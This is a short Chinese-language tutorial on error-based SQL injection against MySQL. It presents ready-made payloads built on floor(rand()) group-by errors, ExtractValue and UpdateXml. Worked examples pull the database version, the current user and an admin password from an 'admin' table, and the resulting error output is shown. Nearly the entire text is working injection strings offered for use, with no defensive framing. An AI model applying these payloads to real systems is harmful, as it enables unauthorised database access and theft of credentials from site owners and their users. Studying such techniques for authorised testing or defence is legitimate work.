1、通過floor報錯

可以通過如下一些利用代碼

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

舉例如下：

首先進行正常查詢：

mysql> select * from article where id = 1;

+—-+——-+———+

| id | title | content |

+—-+——-+———+

| 1 | test | do it |

+—-+——-+———+

假如id輸入存在注入的話，可以通過如下語句進行報錯。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’

可以看到成功爆出了Mysql的版本，如果需要查詢其他數據，可以通過修改version()所在位置語句進行查詢。

例如我們需要查詢管理員用戶名和密碼：

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

2、ExtractValue

測試語句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

實際測試過程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’

3、UpdateXml

測試語句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

實際測試過程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:root@localhost’